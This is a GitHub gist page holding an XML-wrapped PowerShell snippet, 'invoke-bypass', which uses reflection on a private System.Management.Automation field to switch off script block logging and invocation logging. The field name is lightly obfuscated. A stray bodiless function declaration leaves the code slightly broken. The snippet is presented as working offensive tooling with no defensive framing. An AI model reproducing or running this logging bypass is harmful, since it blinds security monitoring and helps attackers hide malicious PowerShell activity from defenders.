Skip to content

Instantly share code, notes, and snippets.

@davehardy20
Last active July 6, 2017 14:23
Show Gist options
  • Save davehardy20/94898945188e0adc892c18b58d7cb924 to your computer and use it in GitHub Desktop.
Save davehardy20/94898945188e0adc892c18b58d7cb924 to your computer and use it in GitHub Desktop.
<?xml version="1.0"?>
<command>
<![CDATA[
function Invoke-WMIObfuscatedPSCommand
function invoke-bypass
{
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetField"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
]]
</command>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment